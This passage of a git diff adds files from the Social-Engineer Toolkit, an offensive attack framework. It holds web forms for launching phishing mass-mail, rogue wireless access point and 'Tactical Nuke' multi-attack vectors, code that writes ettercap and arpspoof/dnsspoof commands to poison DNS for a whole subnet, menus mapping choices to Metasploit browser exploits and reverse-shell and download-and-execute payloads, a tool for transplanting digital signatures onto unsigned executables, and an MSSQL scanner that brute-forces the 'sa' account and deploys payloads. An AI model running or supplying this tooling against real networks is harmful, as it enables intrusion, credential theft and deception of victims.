<option value="9">nonalpha</option>
<option value="10">nonupper</option>
<option value="11">unicode_mixed</option>
<option value="12">unicode_upper</option>
<option value="13">alpha2</option>
<option value="14">No Encoding</option>
<option value="15">Multi-Encoder</option>
<option value="16" selected="selected">Backdoored Executable</option>
</select>
<br><br>
<p><b>Default Port for Listener</b></p>
Enter the default port: <input type="text" name="port" size="7" value="443" STYLE="font-family : arial; font-size : 7pt"/>
<br><br>
<br><p><b>Java Applet ONLY - Additional Targets</b><p>
<input type="checkbox" name="osxlinuxtarget" value="osx"> Target OSX and Linux<br>
Enter the default port OSX: <input type="text" name="portosx" size="7" value="8080" STYLE="font-family : arial; font-size : 7pt"/><br><br>
Enter the default port Linux: <input type="text" name="portlin" size="7" value="8081" STYLE="font-family : arial; font-size : 7pt"/>
<br><br>
<p><b>Multi-Attack Vector Only - Do not use this unless Multi-Attack Vector is enabled.</b</p>
<input type="checkbox" name="multiattack1" value="1"> Java Applet Attack Method<br>
<input type="checkbox" name="multiattack2" value="2"> Metasploit Browser Exploit Method<br>
<input type="checkbox" name="multiattack3" value="3"> Credential Harvester Attack Method<br>
<input type="checkbox" name="multiattack4" value="4"> Tabnabbing Attack Method<br>
<input type="checkbox" name="multiattack5" value="5"> Man Left in the Middle Attack Method<br>
<input type="checkbox" name="multiattack6" value="6"> Web Jacking Attack Method<br>
<input type="checkbox" name="multiattack7" value="7"> Use them all - A.K.A. 'Tactical Nuke'<br>
<CHECKHERE>
<br><br><input type="submit" value="Launch Attack" STYLE="font-family : arial; font-size : 7pt">
</form>
</div>
</div>
<br><br>
</div>

34
src/commandcenter/webattack_email.site Normal file
View file

@ -0,0 +1,34 @@
<br><br>
<p><b>Mass Mailer Options for the Social-Engineer Toolkit (SET)</b><p>
<input type="checkbox" name="webattack_email" value="1"> E-Mail Attack Single Email Address<br>
<input type="checkbox" name="webattack_email" value="2"> E-Mail Attack Mass Mailer<br>
<br>
If your using mass emailer, browser to file with email addresses: <input type="file" name="massmailer_file" size="5">
<br>
<br>
Enter who you want to send the email to: <input type="text" name="emailto" /><br />
<br><br>
<input type="checkbox" name="webattack_account" value="1" STYLE="font-family : arial; font-size : 7pt" > Use a GMAIL account for your email attack<br>
<input type="checkbox" name="webattack_account" value="2" STYLE="font-family : arial; font-size : 7pt" > Use your own open-relay SMTP Server<br>
<br><br>
<p><b>THIS OPTION FOR OPEN-RELAY ONLY</b></p>
<br>
Enter your email address you want to come from: <input type="text" name="emailfrom_relay" STYLE="font-family : arial; font-size : 7pt" /><br />
Enter your username for open relay (leave blank if there is none): <input type="text" name="username_relay" STYLE="font-family : arial; font-size : 7pt" /><br />
Enter your password for open relay (leave blank if there is none): <input type="password" name="password_relay" STYLE="font-family : arial; font-size : 7pt" /><br />
Enter the SMTP Server address for the open relay: <input type="text" name="smtp_relay" STYLE="font-family : arial; font-size : 7pt" /><br/>
Enter the port number for the SMTP server: <input type="text" name="smtp_port_relay" value="25" size="3" STYLE="font-family : arial; font-size : 7pt" /><br/>
<br><br>
<p><b>THIS OPTION FOR GMAIL ATTACK ONLY!</b></p><br>
Enter your email address: <input type="text" name="emailfrom" STYLE="font-family : arial; font-size : 7pt" /><br />
Enter your password for the email address: <input type="password" name="password" STYLE="font-family : arial; font-size : 7pt" /><br />
<br><br>
<p><b>Required fields below</b></p>
Enter the subject for the email: <input type="text" name="subject" STYLE="font-family : arial; font-size : 7pt" /><br />
<br><br>
<input type="checkbox" name="webattack_message" value="1" STYLE="font-family : arial; font-size : 7pt"> Use HTML for the email attack<br>
<input type="checkbox" name="webattack_message" value="2" STYLE="font-family : arial; font-size : 7pt"> Use Plain text for the email attack<br>
<br><br>
Enter your email message here<br><TEXTAREA NAME="comments" COLS=40 ROWS=6 STYLE="font-family : arial; font-size : 7pt"></TEXTAREA>
<br>

31
src/commandcenter/wireless.site Normal file
View file

@ -0,0 +1,31 @@
<div class="post">
<h4 class="dates">The Social-Engineer Toolkit (SET) Wireless Attack Vector</h4>
<div class="entry">
<h2>Wireless Access Point Attack Vector</h2>
Welcome to the Wireless Attack Vector, this will create an access point leveraging
your wireless card and redirect all DNS queries to you. The concept is fairly simple,
SET will create a wireless access point, dhcp server, and spoof DNS to redirect traffic
to the attacker machine. It will then exit out of that menu with everything running as
a child process.
<br><br>
You can then launch any SET attack vector you want, for example the Java Applet attack and
when a victim joins your access point and tries going to a website, will be redirected to
your attacker machine.
<br><br>
This attack vector uses AirBase-NG, AirMon-NG, DNSSpoof, and dhcpd3 to work properly.
<br>
<br><p><b>Wireless Options</b></p>
<form action="/wireless_post" method="POST">
<input type="checkbox" name="wireless" value="1"> Start the SET Wireless Attack Vector Access Point<br>
<input type="checkbox" name="wireless" value="2"> Stop the SET Wireless Attack Vector Access Point<br>
<br><br>
Enter your wifi interface: <input type="text" name="wifi_interface" STYLE="font-family : arial; font-size : 7pt"/><br />
<br><br>
<input type="submit" value="Launch Attack"></form>
</form>
</div>
</div>
<br><br>
</div>

0
src/core/__init__.py Normal file
View file

0
src/core/arp_cache/__init__.py Normal file
View file

168
src/core/arp_cache/arp.py Normal file
View file

@ -0,0 +1,168 @@
import subprocess
import re
import pexpect
import os
import time
import sys
from src.core import setcore
# Define to use ettercap or dsniff or nothing.
#
# Thanks to sami8007 and trcx for the dsniff addition
definepath=os.getcwd()
# grab config file
config=file("config/set_config", "r").readlines()
# grab our default directory
cwd=os.getcwd()
# set a variable as default to n or no
ettercapchoice= 'n'
# add dsniffchoice
dsniffchoice = 'n'
for line in config:
# check for ettercap choice here
match1=re.search("ETTERCAP=ON",line)
if match1:
setcore.print_info("ARP Cache Poisoning is set to " + setcore.bcolors.GREEN + "ON" + setcore.bcolors.ENDC)
ettercapchoice='y'
# check for dsniff choice here
match2=re.search("DSNIFF=ON", line)
if match2:
setcore.print_info("DSNIFF DNS Poisoning is set to " + setcore.bcolors.GREEN + "ON" + setcore.bcolors.ENDC)
dsniffchoice = 'y'
ettercapchoice = 'n'
# GRAB CONFIG from SET
fileopen=file("config/set_config", "r").readlines()
for line in fileopen:
# grab the ettercap interface
match=re.search("ETTERCAP_INTERFACE=", line)
if match:
line=line.rstrip()
interface=line.split("=")
interface=interface[1]
if interface == "NONE":
interface=""
# grab the ettercap path
etterpath=re.search("ETTERCAP_PATH=", line)
if etterpath:
line=line.rstrip()
path=line.replace("ETTERCAP_PATH=", "")
if not os.path.isfile(path):
path = ("/usr/local/share/ettercap")
# if we are using ettercap then get everything ready
if ettercapchoice== 'y':
fileopen=file("src/program_junk/ipaddr.file","r").readlines()
for line in fileopen:
line=line.rstrip()
ipaddr=line
if ettercapchoice == 'y':
try:
print """
This attack will poison all victims on your local subnet, and redirect them
when they hit a specific website. The next prompt will ask you which site you
will want to trigger the DNS redirect on. A simple example of this is if you
wanted to trigger everyone on your subnet to connect to you when they go to
browse to www.google.com, the victim would then be redirected to your malicious
site. You can alternatively poison everyone and everysite by using the wildcard
'*' flag.
IF YOU WANT TO POISON ALL DNS ENTRIES (DEFAULT) JUST HIT ENTER OR *
"""
setcore.print_info("Example: http://www.google.com")
dns_spoof=raw_input(setcore.setprompt("0", "Site to redirect to attack machine [*]"))
os.chdir(path)
# small fix for default
if dns_spoof == "":
# set default to * (everything)
dns_spoof="*"
# remove old stale files
subprocess.Popen("rm etter.dns 1> /dev/null 2> /dev/null", shell=True).wait()
# prep etter.dns for writing
filewrite=file("etter.dns", "w")
# send our information to etter.dns
filewrite.write("%s A %s" % (dns_spoof,ipaddr))
# close the file
filewrite.close()
# set bridge variable to nothing
bridge=""
# assign -M arp to arp variable
arp="-M arp"
# grab input from user
#bridge_q=raw_input(setcore.setprompt("0", "Use bridged mode [yes|no]"))
#if bridge_q == "y" or bridge_q == "yes":
# bridge_int=raw_input(setcore.setprompt("0", "Network interface for the bridge"))
# bridge="-B "+str(bridge_int)
#arp=""
setcore.print_error("LAUNCHING ETTERCAP DNS_SPOOF ATTACK!")
# spawn a child process
os.chdir(cwd)
time.sleep(5)
filewrite=file("src/program_junk/ettercap","w")
filewrite.write("ettercap -T -q -i %s -P dns_spoof %s %s // //" % (interface,arp,bridge))
filewrite.close()
os.chdir(cwd)
except Exception, error:
os.chdir(cwd)
#log(error)
setcore.print_error("ERROR:An error has occured:")
print "ERROR:" +str(error)
# if we are using dsniff
if dsniffchoice == 'y':
fileopen=file("src/program_junk/ipaddr.file","r").readlines()
for line in fileopen:
line=line.rstrip()
ipaddr=line
if dsniffchoice == 'y':
try:
print """
This attack will poison all victims on your local subnet, and redirect them
when they hit a specific website. The next prompt will ask you which site you
will want to trigger the DNS redirect on. A simple example of this is if you
wanted to trigger everyone on your subnet to connect to you when they go to
browse to www.google.com, the victim would then be redirected to your malicious
site. You can alternatively poison everyone and everysite by using the wildcard
'*' flag.
IF YOU WANT TO POISON ALL DNS ENTRIES (DEFAULT) JUST HIT ENTER OR *
"""
setcore.print_info("Example: http://www.google.com")
dns_spoof=raw_input(setcore.setprompt("0", "Site to redirect to attack machine [*]"))
#os.chdir(path)
# small fix for default
if dns_spoof == "":
dns_spoof="*"
subprocess.Popen("rm src/program_junk/dnsspoof.conf 1> /dev/null 2> /dev/null", shell=True).wait()
filewrite=file("src/program_junk/dnsspoof.conf", "w")
filewrite.write("%s %s" % (ipaddr, dns_spoof))
filewrite.close()
setcore.print_error("LAUNCHING DNSSPOOF DNS_SPOOF ATTACK!")
# spawn a child process
os.chdir(cwd)
# time.sleep(5)
# grab default gateway, should eventually replace with pynetinfo python module
gateway = subprocess.Popen("netstat -rn|grep %s|awk '{print $2}'| awk 'NR==2'" % (interface), shell=True, stdout=subprocess.PIPE).communicate()[0]
# open file for writing
filewrite=file("src/program_junk/ettercap","w")
# write the arpspoof / dnsspoof commands to file
filewrite.write("arpspoof %s | dnsspoof -f src/program_junk/dnsspoof.conf" % (gateway))
# close the file
filewrite.close()
# change back to normal directory
os.chdir(cwd)
# this is needed to keep it similar to format above for web gui mode
pause=raw_input("Press <return> to begin dsniff.")
except Exception, error:
os.chdir(cwd)
#log(error)
# print error message
setcore.print_error("ERROR:An error has occurred:")
print setcore.bcolors.RED + "ERROR" + str(error) + setcore.bcolors.ENDC

232
src/core/dictionaries.py Normal file
View file

@ -0,0 +1,232 @@
#!/usr/bin/env python
""" Python lists used for quick conversion of user input
to strings used by the toolkit
"""
def encoder_type(encode):
"""
Takes the value sent from the user encoding menu and returns
the actual value to be used.
"""
return {
'0':"",
'1':"avoid_utf8_tolower",
'2':"shikata_ga_nai",
'3':"alpha_mixed",
'4':"alpha_upper",
'5':"call4_dword_xor",
'6':"countdown",
'7':"fnstenv_mov",
'8':"jmp_call_additive",
'9':"nonalpha",
'10':"nonupper",
'11':"unicode_mixed",
'12':"unicode_upper",
'13':"alpha2",
'14':"",
'15':"MULTIENCODE",
'16':"BACKDOOR",
}.get(encode,"ERROR")
def ms_module(exploit):
""" Receives the input given by the user from gen_payload.py """
return {
'1':"exploit/windows/browser/ie_cdwnbindinfo_uaf",
'2':"exploit/multi/browser/java_jre17_exec",
'3':"exploit/windows/browser/ie_execcommand_uaf",
'4':"exploit/multi/browser/java_atomicreferencearray",
'5':"exploit/multi/browser/java_verifier_field_access",
'6':"exploit/windows/browser/ms12_037_same_id",
'7':"exploit/windows/browser/msxml_get_definition_code_exec",
'8':"exploit/windows/browser/adobe_flash_rtmp",
'9':"exploit/windows/browser/adobe_flash_mp4_cprt",
'10':"exploit/windows/browser/ms12_004_midi",
'11':"multi/browser/java_rhino\nset target 1",
'12':"windows/browser/ms11_050_mshtml_cobjectelement",
'13':"windows/browser/adobe_flashplayer_flash10o",
'14':"windows/browser/cisco_anyconnect_exec",
'15':"windows/browser/ms11_003_ie_css_import",
'16':"windows/browser/wmi_admintools",
'17':"windows/browser/ms10_090_ie_css_clip",
'18':"windows/browser/java_codebase_trust",
'19':"windows/browser/java_docbase_bof",
'20':"windows/browser/webdav_dll_hijacker",
'21':"windows/browser/adobe_flashplayer_avm",
'22':"windows/browser/adobe_shockwave_rcsl_corruption",
'23':"windows/browser/adobe_cooltype_sing",
'24':"windows/browser/apple_quicktime_marshaled_punk",
'25':"windows/browser/ms10_042_helpctr_xss_cmd_exec",
'26':"windows/browser/ms10_018_ie_behaviors",
'27':"windows/browser/ms10_002_aurora",
'28':"windows/browser/ms10_018_ie_tabular_activex",
'29':"windows/browser/ms09_002_memory_corruption",
'30':"windows/browser/ms09_072_style_object",
'31':"windows/browser/ie_iscomponentinstalled",
'32':"windows/browser/ms08_078_xml_corruption",
'33':"windows/browser/ie_unsafe_scripting",
'34':"multi/browser/firefox_escape_retval",
'35':"windows/browser/mozilla_mchannel",
'36':"auxiliary/server/browser_autopwn",
}.get(exploit,"ERROR")
# called from gen_payload.py
# uses payload_menu_2
def ms_payload(payload):
"""
Receives the input given by the user from create_payload.py
and create_payloads.py
"""
return {
'1':"windows/shell_reverse_tcp",
'2':"windows/meterpreter/reverse_tcp",
'3':"windows/vncinject/reverse_tcp",
'4':"windows/shell_bind_tcp",
'5':"windows/x64/shell_bind_tcp",
'6':"windows/x64/shell_reverse_tcp",
'7':"windows/x64/meterpreter/reverse_tcp",
'8':"windows/meterpreter/reverse_tcp_allports",
'9':"windows/meterpreter/reverse_https",
'10':"windows/meterpreter/reverse_tcp_dns",
'11':"windows/download_exec",
}.get(payload,"ERROR")
# called from create_payloads.py
def ms_payload_2(payload):
""" Receives the input given by the user from create_payloadS.py """
return {
'1':"windows/shell_reverse_tcp",
'2':"windows/meterpreter/reverse_tcp",
'3':"windows/vncinject/reverse_tcp",
'4':"windows/shell_bind_tcp",
'5':"windows/x64/shell_bind_tcp",
'6':"windows/x64/shell_reverse_tcp",
'7':"windows/x64/meterpreter/reverse_tcp",
'8':"windows/meterpreter/reverse_tcp_allports",
'9':"windows/meterpreter/reverse_https",
'10':"windows/meterpreter/reverse_tcp_dns",
'11':"set/reverse_shell",
'12':"set/reverse_shell",
'13':"set/reverse_shell",
'14':"shellcode/alphanum",
'15':"shellcode/pyinject",
'16':"shellcode/multipyinject",
}.get(payload,"ERROR")
def ms_payload_3(payload):
""" Receives the input given by the user from create_payloadS.py """
return {
'1':"windows/shell_reverse_tcp",
'2':"windows/meterpreter/reverse_tcp",
'3':"windows/vncinject/reverse_tcp",
'4':"windows/x64/shell_reverse_tcp",
'5':"windows/x64/meterpreter/reverse_tcp",
'6':"windows/x64/shell_bind_tcp",
'7':"windows/meterpreter/reverse_https",
}.get(payload,"ERROR")
# uses create_payloads_menu
def ms_attacks(exploit):
""" Receives the input given by the user from create_payload.py """
return {
'1':"dll_hijacking",
'2':"unc_embed",
'3':"exploit/windows/fileformat/ms11_006_createsizeddibsection",
'4':"exploit/windows/fileformat/ms10_087_rtf_pfragments_bof",
'5':"exploit/windows/fileformat/adobe_flashplayer_button",
'6':"exploit/windows/fileformat/adobe_cooltype_sing",
'7':"exploit/windows/fileformat/adobe_flashplayer_newfunction",
'8':"exploit/windows/fileformat/adobe_collectemailinfo",
'9':"exploit/windows/fileformat/adobe_geticon",
'10':"exploit/windows/fileformat/adobe_jbig2decode",
'11':"exploit/windows/fileformat/adobe_pdf_embedded_exe",
'12':"exploit/windows/fileformat/adobe_utilprintf",
'13':"custom/exe/to/vba/payload",
'14':"exploit/windows/fileformat/adobe_u3d_meshdecl",
'15':'exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs',
'16':"exploit/windows/fileformat/foxit_title_bof",
'17':"exploit/windows/fileformat/apple_quicktime_pnsize",
'18':"exploit/windows/fileformat/nuance_pdf_launch_overflow",
'19':"exploit/windows/fileformat/adobe_reader_u3d",
'20':"exploit/windows/fileformat/ms12_027_mscomctl_bof",
}.get(exploit,"INVALID")
def teensy_config(choice):
""" Receives the input given by the user from set.py """
return {
'1':"powershell_down.pde",
'2':"wscript.pde",
'3':"powershell_reverse.pde",
'4':"beef.pde",
'5':"java_applet.pde",
'6':"gnome_wget.pde"
}.get(choice,"ERROR")
def webattack_vector(attack_vector):
""" Receives the input given by the user from set.py """
return {
'1':"java",
'2':"browser",
'3':"harvester",
'4':"tabnapping",
'5':"mlitme",
'6':"webjacking",
'7':"multiattack"
}.get(attack_vector,"ERROR")
def category(category):
"""
Takes the value sent from the user encoding menu and returns
the actual value to be used.
"""
return {
'0':"0",
'1':"phishing",
'2':"webattack",
'3':"infectious",
'4':"payloads",
'5':"mailer",
'6':"arduino",
'7':"sms",
'8':"wireless",
'9':"modules",
'10':"cloner",
'11':"harvester",
'12':"tabnapping",
'13':"teensy",
'14':"binary2teensy",
'15':"dll_hijacking",
'16':"multiattack",
'17':"java_applet",
'18':"encoding",
'19':"fasttrack",
'20':"autopwn",
'21':"mssql",
'22':"scan",
'23':"direct",
'24':"exploits",
'25':"active_target",
'26':"shell",
'27':"set",
'28':"teensy2powershell",
'29':"powershell",
'30':"delldrac"
}.get(category,"ERROR")

0
src/core/digitalsig/__init__.py Normal file
View file

BIN
src/core/digitalsig/digital.signature Normal file
View file

Binary file not shown.

155
src/core/digitalsig/disitool.py Executable file
View file

@ -0,0 +1,155 @@
#!/usr/bin/env python
#
# Notes from rel1k here... Had to downgrade to 0.1, the latest (0.3 currently) uses a different way for checksums of the peheader.
# This dies and fails in 64 bit operating systems, since this is the older version, shouldn't be a big deal, still works as expected.
#
"""V0.1 2007/12/18 - 2008/01/09
tool to manipulate digital signatures in PE files
commands:
- delete signed-file unsigned-file
- copy signed-source-file unsigned-file signed-file
- extract signed-file signature
- add signature unsigned-file signed-file
Source code put in public domain by Didier Stevens, no Copyright
https://DidierStevens.com
Use at your own risk
History:
2007/12/21: added arguments
2008/01/09: code review
requires pefile:
http://code.google.com/p/pefile/
to install: setup.py install
"""
import pefile
import sys
from struct import *
def Usage():
"""Displays the usage of this tool
"""
print "Usage: disitool command [options] file ..."
print " disitool V0.1, tool to manipulate digital signatures in PE files"
print " commands:"
print " - delete signed-file unsigned-file"
print " - copy signed-source-file unsigned-file signed-file"
print " - extract signed-file signature"
print " - add signature unsigned-file signed-file"
print " Source code put in the public domain by Didier Stevens, no Copyright"
print " Use at your own risk"
print " https://DidierStevens.com"
def DeleteDigitalSignature(SignedFile, UnsignedFile=None):
"""Deletes the digital signature from file SignedFile
When UnsignedFile is not None, writes the modified file to UnsignedFile
Returns the modified file as a PE file
"""
pe = pefile.PE(SignedFile)
address = pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].VirtualAddress
pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].VirtualAddress = 0
pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].Size = 0
if address != 0:
new_file_data = pe.write()[0:address]
else:
new_file_data = pe.write()
if UnsignedFile:
f = file(UnsignedFile, 'wb+')
f.write(new_file_data)
f.close()
return new_file_data
def CopyDigitalSignature(SignedSourceFile, UnsignedFile, SignedFile=None):
"""Extracts the digital signature from file SignedSourceFile and adds it to file UnsignedFile
When SignedFile is not None, writes the modified file to SignedFile
Returns the modified file as a PE file
"""
peSignedSource = pefile.PE(SignedSourceFile)
address = peSignedSource.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].VirtualAddress
size = peSignedSource.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].Size
if address == 0:
print "Error: source file not signed"
return
signature = peSignedSource.write()[address:]
peUnsigned = DeleteDigitalSignature(UnsignedFile)
peSignedFile = pefile.PE(data=''.join(list(peUnsigned) + list(signature)))
peSignedFile.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].VirtualAddress = len(peUnsigned)
peSignedFile.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].Size = size
new_file_data = peSignedFile.write()
if SignedFile:
f = file(SignedFile, 'wb+')
f.write(new_file_data)
f.close()
return new_file_data
def ExtractDigitalSignature(SignedFile, SignatureFile=None):
"""Extracts the digital signature from file SignedFile
When SignatureFile is not None, writes the signature to SignatureFile
Returns the signature
"""
pe = pefile.PE(SignedFile)
address = pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].VirtualAddress
size = pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].Size
if address == 0:
print "Error: source file not signed"
return
signature = pe.write()[address+8:]
if SignatureFile:
f = file(SignatureFile, 'wb+')
f.write(signature)
f.close()
return signature
def AddDigitalSignature(SignatureFile, UnsignedFile, SignedFile=None):
"""Adds the digital signature from file SignatureFile to file UnsignedFile
When SignedFile is not None, writes the modified file to SignedFile
Returns the modified file as a PE file
"""
f = file(SignatureFile, 'rb')
signature = f.read()
f.close()
size = len(signature) + 8
peUnsigned = DeleteDigitalSignature(UnsignedFile)
peSignedFile = pefile.PE(data=''.join(list(peUnsigned) + list(unpack("4c", pack("i", size))) + ['\x00', '\x02', '\x02', '\x00'] + list(signature)))
peSignedFile.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].VirtualAddress = len(peUnsigned)
peSignedFile.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].Size = size
new_file_data = peSignedFile.write()
if SignedFile:
f = file(SignedFile, 'wb+')
f.write(new_file_data)
f.close()
return new_file_data

274
src/core/fasttrack.py Normal file
View file

@ -0,0 +1,274 @@
#!/usr/bin/python
from src.core.setcore import *
from src.core.menu import text
import subprocess
definepath = os.getcwd()
try:
import _mssql
except ImportError:
print_error("PYMSSQL is not installed. MSSQL attacks will not work!")
operating_system = check_os()
if operating_system == "windows":
print_status("You can download PYMSSQL executables from here: http://www.lfd.uci.edu/~gohlke/pythonlibs/")
raw_input("Press {return} to continue.")
pass
#
#
# Fast-Track Main options and interface menus
#
#
check_mssql()
try:
while 1:
###################################################
# USER INPUT: SHOW WEB ATTACK MENU #
###################################################
create_menu(text.fasttrack_text, text.fasttrack_menu)
attack_vector = raw_input(setprompt(["19"], ""))
if attack_vector == "99" or attack_vector == "quit" or attack_vector == "exit":
break
##################################
##################################
# mssql_scanner
##################################
##################################
if attack_vector == "1":
# start the menu
create_menu(text.fasttrack_mssql_text1, text.fasttrack_mssql_menu1)
# take input here
attack_vector_sql = raw_input(setprompt(["19","21"], ""))
#
# option 1 scan and attack, option 2 connect directly to mssql
# if 1, start scan and attack
#
if attack_vector_sql == '1':
print "\nHere you can select either a CIDR notation/IP Address or a filename\nthat contains a list of IP Addresses.\n\nFormat for a file would be similar to this:\n\n192.168.13.25\n192.168.13.26\n192.168.13.26\n\n1. Scan IP address or CIDR\n2. Import file that contains SQL Server IP addresses\n"
choice = raw_input(setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
# grab ip address
range = raw_input(setprompt(["19","21","22"], "Enter the CIDR, single IP, or filename with IP addresses (ex. 192.168.1.1/24 or filename.txt)"))
# grab the port
port = raw_input(setprompt(["19","21","22"], "Enter the port number to scan [1433]"))
# if default use 1433
if port == "": port = 1433
# ask for a wordlist
wordlist = raw_input(setprompt(["19","21","22"], "Enter path to a wordlist file [use default wordlist]"))
if wordlist == "": wordlist = "default"
# specify the user to brute force
username = raw_input(setprompt(["19","21","22"], "Enter the username to brute force [sa]"))
# default to sa
if username == "": username = "sa"
# import the mssql module from fasttrack
from src.fasttrack import mssql
# choice from earlier if we want to use a filelist or whatnot
if choice != "2":
# sql_servers
sql_servers = mssql.scan(range, port, port)
# specify choice 2
if choice == "2":
if not os.path.isfile(range):
while 1:
print_warning("Sorry boss. The file was not found. Try again")
range = raw_input(setprompt(["19","21", "22"], "Enter the CIDR, single, IP, or file with IP addresses (ex. 192.168.1.1/24)"))
if os.path.isfile(range):
print_status("Atta boy. Found the file this time. Moving on.")
break
fileopen = file(range, "r").readlines()
sql_servers = ""
for line in fileopen:
line=line.rstrip()
sql_servers = sql_servers + line + ","
# this will hold all of the SQL servers eventually
master_list = ""
# set a base counter
counter = 0
if sql_servers != False:
# get rid of extra data from port scanner
sql_servers = sql_servers.replace(":%s OPEN" % (port), "")
# split into tuple for different IP address
sql_servers = sql_servers.split(",")
# start loop and brute force
for servers in sql_servers:
# this will return the following format ipaddr + "," + username + "," + str(port) + "," + passwords
if servers != "":
sql_success = mssql.brute(servers, username, port, wordlist)
if sql_success != False:
# after each success or fail it will break into this to the above with a newline to be parsed later
master_list = master_list + sql_success + ":"
counter = 1
# if we didn't successful attack one
if counter == 0:
print_warning("Sorry. Unable to locate or fully compromise a MSSQL Server.")
pause = raw_input("Press {return} to continue to the main menu.")
# if we successfully attacked one
if counter == 1:
# need to loop to keep menu going
while 1:
# set a counter to show compromised servers
counter = 1
# here we list the servers we compromised
master_names = master_list.split(":")
print_status("Select the compromise SQL server you want to interact with:\n")
for success in master_names:
if success != "":
success = success.rstrip()
success=success.split(",")
success= bcolors.BOLD + success[0] + bcolors.ENDC + " username: " + bcolors.BOLD + "%s" % (success[1]) + bcolors.ENDC + " | password: " + bcolors.BOLD + "%s" % (success[3]) + bcolors.ENDC
print " " + str(counter) + ". " + success
# increment counter
counter = counter + 1
print "\n 99. Return back to the main menu.\n"
# select the server to interact with
select_server = raw_input(setprompt(["19","21","22"], "Select the SQL server to interact with [1]"))
# default 1
if select_server == "quit" or select_server == "exit": break
if select_server == "": select_server = "1"
if select_server == "99": break
counter = 1
for success in master_names:
if success != "":
success = success.rstrip()
success = success.split(",")
# if we equal the number used above
if counter == int(select_server):
# ipaddr + "," + username + "," + str(port) + "," + passwords
print "\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) or powershell (vista,win7)\n\n 1. Windows Powershell\n 2. Windows Debug Conversion\n 3. Standard Windows Shell\n\n 99. Return back to the main menu.\n"
option = raw_input(setprompt(["19","21","22"], "Which deployment option do you want [1]"))
if option == "": option = "2"
# if 99 then break
if option == "99": break
# specify we are using the fasttrack option, this disables some features
filewrite = file("src/program_junk/fasttrack.options", "w")
filewrite.write("none")
filewrite.close()
# import fasttrack
if option == "1" or option == "2":
# import payloads for selection and prep
try: reload(src.core.payloadgen.create_payloads)
except: import src.core.payloadgen.create_payloads
mssql.deploy_hex2binary(success[0], success[2], success[1], success[3], option)
# straight up connect
if option == "3":
mssql.cmdshell(success[0], success[2], success[1], success[3], option)
# increment counter
counter = counter + 1
#
# if we want to connect directly to a SQL server
#
if attack_vector_sql == "2":
sql_server = raw_input(setprompt(["19","21","23"], "Enter the hostname or IP address of the SQL server"))
sql_port = raw_input(setprompt(["19","21","23"], "Enter the SQL port to connect [1433]"))
if sql_port == "": sql_port = "1433"
sql_username = raw_input(setprompt(["19","21","23"], "Enter the username of the SQL Server [sa]"))
# default to sa
if sql_username == "": sql_username = "sa"
sql_password = raw_input(setprompt(["19","21","23"], "Enter the password for the SQL server"))
print_status("Connecting to the SQL server...")
# try connecting
# establish base counter for connection
counter = 0
try:
conn = _mssql.connect(sql_server + ":" + str(sql_port), sql_username, sql_password)
counter = 1
except Exception, e:
print e
print_error("Connection to SQL Server failed. Try again.")
# if we had a successful connection
if counter == 1:
print_status("Dropping into a SQL shell. Type quit to exit.")
# loop forever
while 1:
# enter the sql command
sql_shell = raw_input("Enter your SQL command here: ")
if sql_shell == "quit" or sql_shell == "exit":
print_status("Exiting the SQL shell and returning to menu.")
break
try:
# execute the query
sql_query = conn.execute_query(sql_shell)
# return results
print "\n"
for data in conn:
data = str(data)
data = data.replace("\\n\\t", "\n")
data = data.replace("\\n", "\n")
data = data.replace("{0: '", "")
data = data.replace("'}", "")
print data
except Exception, e:
print_warning("\nIncorrect syntax somewhere. Printing error message: " + str(e))
##################################
##################################
# exploits menu
##################################
##################################
if attack_vector == "2":
# start the menu
create_menu(text.fasttrack_exploits_text1, text.fasttrack_exploits_menu1)
# enter the exploits menu here
range = raw_input(setprompt(["19","24"], "Select the number of the exploit you want"))
# ms08067
if range == "1":
try: reload(src.fasttrack.exploits.ms08067)
except: import src.fasttrack.exploits.ms08067
# firefox 3.6.16
if range == "2":
try: reload(src.fasttrack.exploits.firefox_3_6_16)
except: import src.fasttrack.exploits.firefox_3_6_16
# solarwinds
if range == "3":
try: reload(src.fasttrack.exploits.solarwinds)
except: import src.fasttrack.exploits.solarwinds
# rdp DoS
if range == "4":
try: reload(src.fasttrack.exploits.rdpdos)
except: import src.fasttrack.exploits.rdpdos
if range == "5":
try: reload(src.fasttrack.exploits.mysql_bypass)
except: import src.fasttrack.exploits.mysql_bypass
if range == "6":
try: reload(src.fasttrack.exploits.f5)
except: import src.fasttrack.exploits.f5
##################################
##################################
# sccm attack menu
##################################
##################################
if attack_vector == "3":
# load sccm attack
try: reload(src.fasttrack.sccm.sccm_main)
except: import src.fasttrack.sccm.sccm_main
##################################
##################################
# dell drac default credential checker
##################################
##################################
if attack_vector == "4":
# load drac menu
subprocess.Popen("python %s/src/fasttrack/delldrac.py" % (definepath), shell=True).wait()
# handle keyboard exceptions
except KeyboardInterrupt:
pass

0
src/core/menu/__init__.py Normal file
View file

456
src/core/menu/text.py Normal file
View file

@ -0,0 +1,456 @@
#!/usr/bin/env python
from src.core.setcore import bcolors, get_version, check_os, meta_path
# grab version of SET
